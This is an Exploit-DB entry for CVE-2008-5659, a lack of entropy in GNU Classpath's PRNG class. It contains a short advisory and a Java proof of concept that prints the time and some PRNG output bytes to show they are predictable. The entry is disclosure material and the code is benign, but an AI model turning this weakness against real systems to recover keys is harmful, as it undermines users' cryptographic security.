GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (1)

EDB-ID:

32673

CVE:

2008-5659

EDB Verified:

Author:

Jack Lloyd

Type:

remote

Exploit:   /  

Platform:

Multiple

Date:

2008-12-05

Vulnerable App: 
source: https://www.securityfocus.com/bid/32909/info

GNU Classpath is prone to a weakness that may result in weaker cryptographic security because its psuedo-random number generator (PRNG) lacks entropy.

Attackers may leverage this issue to obtain sensitive information that can lead to further attacks.

Classpath 0.97.2 is vulnerable; other versions may also be affected. 

import gnu.java.security.util.PRNG;

class PRNGTest {
   public static void main(String args[])
      {
      long t = System.currentTimeMillis();

      System.out.println("Time in ms is " + t);

      PRNG prng = PRNG.getInstance();

      byte buffer[] = new byte[40];

      prng.nextBytes(buffer, 0, buffer.length);

      for(int i = 0; i != buffer.length; ++i)
         {
         // There must be an easier way to do this (right?)
         int intval = buffer[i];

         if(intval <= 0)
            intval += 256;

         String s = Integer.toHexString(intval);

         if(s.length() == 1)
            s = "0" + s;

         System.out.print(s);
         }
      System.out.println("");
      }
   };
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services